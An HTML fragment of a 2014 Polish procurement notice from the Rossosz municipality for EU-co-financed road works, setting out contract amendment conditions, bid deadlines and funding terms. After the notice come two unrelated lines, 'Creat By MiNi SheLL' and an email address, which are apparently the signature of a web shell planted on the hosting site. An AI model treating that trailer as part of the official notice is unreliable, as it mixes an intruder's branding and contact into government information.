<p>Przewiduje się możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu lecz tylko w następujących warunkach:
1. Jeżeli warunki atmosferyczne nie pozwolą na wykonanie części robót budowlanych drogowych ze względów technologicznych, co może mieć wpływ na jakość wykonania, trwałość i zachowanie okresu gwarancji, albo wystąpią inne uzasadnione przypadki nieprzewidzianych warunków realizacji przedmiotu umowy,
2.Jeżeli zmianie ulegnie urzędowa stawka VAT na przedmiot umowy ,
3. Z powodu siły wyższej zajdzie konieczność zmiany terminu wykonania umowy na usługę lub umowy na wykonanie robót budowlanych drogowych,
4. Z powodu zmiany wysokości lub cofnięcia przyznanych środków finansowych z Programu Współpracy Transgranicznej Polska-Białoruś-Ukraina,
5. Dokonanie odkryć o znaczeniu archeologicznym, które mają wpływ na realizację robót budowlanych drogowych i na wykonanie przedmiotu niniejszej umowy.
Inicjować zmianę warunków przedmiotowej umowy będzie mógł Zamawiający, albo Wykonawca poprzez złożenie wniosku na piśmie, w którym zostaną opisane przyczyny złożenia wniosku wraz z uzasadnieniem, ponadto zostanie określony czas wykonania zmian i ich koszt oraz wpływ zmian na termin zakończenia realizacji umowy i wyrażona na piśmie zgoda drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rossosz.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wójt Gminy Rossosz,  21-533 Rossosz ul. Lubelska 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2014 godzina 10:00, miejsce: Wójt Gminy Rossosz,  21-533 Rossosz ul. Lubelska 8,
Sekretariat pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowany ze środków UE przez Ministerstwo Infrastruktury i Rozwoju w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com